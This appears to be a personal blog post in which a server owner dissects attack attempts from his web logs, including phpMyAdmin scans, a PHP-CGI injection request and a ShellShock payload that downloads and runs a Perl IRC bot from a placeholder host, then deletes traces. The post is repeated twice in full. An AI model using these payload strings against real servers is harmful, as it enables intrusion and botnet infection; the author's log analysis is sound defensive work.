Reverse Engineering Web Server Exploits
,'
/ security

# Reverse Engineering Web Server Exploits

I really like cyber security. It's one of those things, that is both fascinating and fun. I was talking to my friend (who is going through his Offensive Security Certified Professional Certificate) and I mentioned that my blog (more generally this server) has a bunch of interesting exploit attempts run against it.

It got me thinking. Why not reverse engineer a few of these exploits just for kicks? This should make for an interesting blog post.

I do a lot of logging. I think it's a great sysad practice, and a good starting point for looking for suspicious activity. Out of some recent Nginx logs, I found about 20% of the requests to my server were explicitly malicious. It makes me think I should block more IPs:

This is a conservative estimate. Data gathered from cat *.log | grep -iP "(\s?{|(?:cgi\-bin)|(?:phpmyadmin)|(?:pma)|(?:joomla)|(?:\.pl))" | wc -l

Here's a little sample from these logs:

2016/03/22 03:01:15 [error] 15196#0: *111404 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /phpMyAdmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111405 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /phpmyadmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111406 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /pma/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111407 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /myadmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:16 [error] 15196#0: *111408 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /MyAdmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"


That ugly lines above are part of my webserver logs. You can think of these as records of who's talking to my server, and whatever they're asking my server. Web servers in general are just glorified computers set up to talk to the general internet.

So what do these lines actually mean? The lines I posted above, are looking for a specific program called phpMyAdmin. phpMyAdmin is a common (at least with basic consumer web server providers), but buggy program with a ton of vulnerabilities. If this program was found, we can expect that this 'hacker' would attempt to use some of the known flaws of phpMyAdmin to gain access to my server. I do not run phpMyAdmin, thus I'm safe.

However, if this exploit was successful, my server would be at the mercy of this black hat. 'Luckily', there are a ton of other nasties out there, check this guy out:

2016/03/11 10:51:05 [error] 15197#0: *53674 access forbidden by rule, client: 89.248.160.132, server: _, request: "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin2.404324E-315simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp0X0.0000000F886AP-10220.0000000.00000089.248.160.1320.000000ok.txt+-d+cgi1.146232E-321force_redirect%3D0+-d+cgi2.398998E-315redirect_status_env%3D0+-n HTTP/1.1", host: "54.88.194.232"

This looks almost unreadable, but with enough practice you can see that it's trying to trick my webserver into changing some settings and talking to an external server, presumably to say, "Hey this server is free game, exploit away".

A little more readable is this gem (and this is where I'll break down the actual exploit):

31.184.195.114 - - [29/Apr/2016:07:48:14 +0000] "GET /cgi-bin/cgi_wrapper/cgi_wrapper HTTP/1.1" 403 134 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://evilsite/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://evilsite/batman-vs-superman ; fetch http://evilsite/batman-vs-superman ; curl -O http://evilsite/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

Don't run off yet! What does it mean? Well here's the breakdown

31.184.195.114 -                # This is the attacking Server's IP
# it traces back to St. Petersburg, Russia
- [29/Apr/2016:07:48:18 +0000]  # It happened a couple weeks ago
"GET /cgi-bin/up.cgi HTTP/1.1"  # The cgi-bin where web executables might be found on a typical server
403 134 "-"                     # 403 means that my server could not fulfill the request
() { :;};                       # This bit is interesting.
# This is part of the classic 'ShellShock Exploit'.

# If my system were vulnerable, it would execute the following lines of code:
/usr/bin/perl -e 'print Content-Type: text/plain SUCCESS!'; # Use perl to print success so that the attacking server know the exploit worked
system(\x22                                                 # Now run system commands
crontab -r;                                             # Stop all scheduled Jobs. (Some servers might run jobs that look for suspicious behavior)
killall -9 php perl;                                    # Stop all php/perl processes (Stop scripted programs running, might stop a website)
cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ;      # Create and Change directories to /tmp/bat-mobile
fetch http://badManSite/batman-vs-superman ;            # And Again
curl -O http://badMan/batman-vs-superman ;              # And Again I guess, just for luck
perl batman-vs-superman;                                # Try running the script again (Pretty messy scripting huh?)
cd /tmp/; rm -rf bat*                                   # Change directory and remove evidence of the exploit
\x22); # End Command


I don't know who decides to call their hack "batman-vs-superman" but whatever. The script uses something people were losing their minds about awhile back called ShellShock. In a nutshell, if this worked, it would download a perl script and run it on my server. I replaced the link in the script- because the script is still live. I would know because I just downloaded it to read it (in a VM of course), and I don't want anyone accidentally downloading suspicious programs.

So the server (or proxy) ips trace back to Russia, but the actual script is in Portuguese ¡Olá Brasilia!

A quick read over and it's obvious the script opens up an IRC channel. Some quick googling and I found more details and an even newer version. It has the ominous name of Stealth ShellBot by the less ominous sounding Thiago X. A bit more reading makes it looks like it hijacks Apache and then allows someone on the IRC channel to issue commands to the server. Probably used to DDOS and do other terrible things. Pretty nifty huh? Super illegal on their part, but still pretty nifty.

Just a person

Reverse Engineering Web Server Exploits
], ['\$$','\$$']]} }); -->
/ security

# Reverse Engineering Web Server Exploits

I really like cyber security. It's one of those things, that is both fascinating and fun. I was talking to my friend (who is going through his Offensive Security Certified Professional Certificate) and I mentioned that my blog (more generally this server) has a bunch of interesting exploit attempts run against it.

It got me thinking. Why not reverse engineer a few of these exploits just for kicks? This should make for an interesting blog post.

I do a lot of logging. I think it's a great sysad practice, and a good starting point for looking for suspicious activity. Out of some recent Nginx logs, I found about 20% of the requests to my server were explicitly malicious. It makes me think I should block more IPs:

This is a conservative estimate. Data gathered from cat *.log | grep -iP "(\s?{|(?:cgi\-bin)|(?:phpmyadmin)|(?:pma)|(?:joomla)|(?:\.pl))" | wc -l

Here's a little sample from these logs:

2016/03/22 03:01:15 [error] 15196#0: *111404 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /phpMyAdmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111405 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /phpmyadmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111406 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /pma/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:15 [error] 15196#0: *111407 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /myadmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"
2016/03/22 03:01:16 [error] 15196#0: *111408 access forbidden by rule, client: 158.85.125.245, server: _, request: "GET /MyAdmin/scripts/setup.php HTTP/1.1", host: "54.88.194.232"


That ugly lines above are part of my webserver logs. You can think of these as records of who's talking to my server, and whatever they're asking my server. Web servers in general are just glorified computers set up to talk to the general internet.

So what do these lines actually mean? The lines I posted above, are looking for a specific program called phpMyAdmin. phpMyAdmin is a common (at least with basic consumer web server providers), but buggy program with a ton of vulnerabilities. If this program was found, we can expect that this 'hacker' would attempt to use some of the known flaws of phpMyAdmin to gain access to my server. I do not run phpMyAdmin, thus I'm safe.

However, if this exploit was successful, my server would be at the mercy of this black hat. 'Luckily', there are a ton of other nasties out there, check this guy out:

2016/03/11 10:51:05 [error] 15197#0: *53674 access forbidden by rule, client: 89.248.160.132, server: _, request: "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin2.404324E-315simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp0X0.0000000F886AP-10220.0000000.00000089.248.160.1320.000000ok.txt+-d+cgi1.146232E-321force_redirect%3D0+-d+cgi2.398998E-315redirect_status_env%3D0+-n HTTP/1.1", host: "54.88.194.232"

This looks almost unreadable, but with enough practice you can see that it's trying to trick my webserver into changing some settings and talking to an external server, presumably to say, "Hey this server is free game, exploit away".

A little more readable is this gem (and this is where I'll break down the actual exploit):

31.184.195.114 - - [29/Apr/2016:07:48:14 +0000] "GET /cgi-bin/cgi_wrapper/cgi_wrapper HTTP/1.1" 403 134 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://evilsite/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://evilsite/batman-vs-superman ; fetch http://evilsite/batman-vs-superman ; curl -O http://evilsite/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

Don't run off yet! What does it mean? Well here's the breakdown

31.184.195.114 -                # This is the attacking Server's IP
# it traces back to St. Petersburg, Russia
- [29/Apr/2016:07:48:18 +0000]  # It happened a couple weeks ago
"GET /cgi-bin/up.cgi HTTP/1.1"  # The cgi-bin where web executables might be found on a typical server
403 134 "-"                     # 403 means that my server could not fulfill the request
() { :;};                       # This bit is interesting.
# This is part of the classic 'ShellShock Exploit'.

# If my system were vulnerable, it would execute the following lines of code:
/usr/bin/perl -e 'print Content-Type: text/plain SUCCESS!'; # Use perl to print success so that the attacking server know the exploit worked
system(\x22                                                 # Now run system commands
crontab -r;                                             # Stop all scheduled Jobs. (Some servers might run jobs that look for suspicious behavior)
killall -9 php perl;                                    # Stop all php/perl processes (Stop scripted programs running, might stop a website)
cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ;      # Create and Change directories to /tmp/bat-mobile
fetch http://badManSite/batman-vs-superman ;            # And Again
curl -O http://badMan/batman-vs-superman ;              # And Again I guess, just for luck
perl batman-vs-superman;                                # Try running the script again (Pretty messy scripting huh?)
cd /tmp/; rm -rf bat*                                   # Change directory and remove evidence of the exploit
\x22); # End Command


I don't know who decides to call their hack "batman-vs-superman" but whatever. The script uses something people were losing their minds about awhile back called ShellShock. In a nutshell, if this worked, it would download a perl script and run it on my server. I replaced the link in the script- because the script is still live. I would know because I just downloaded it to read it (in a VM of course), and I don't want anyone accidentally downloading suspicious programs.

So the server (or proxy) ips trace back to Russia, but the actual script is in Portuguese ¡Olá Brasilia!

A quick read over and it's obvious the script opens up an IRC channel. Some quick googling and I found more details and an even newer version. It has the ominous name of Stealth ShellBot by the less ominous sounding Thiago X. A bit more reading makes it looks like it hijacks Apache and then allows someone on the IRC channel to issue commands to the server. Probably used to DDOS and do other terrible things. Pretty nifty huh? Super illegal on their part, but still pretty nifty.

Just a person

Reverse Engineering Web Server Exploits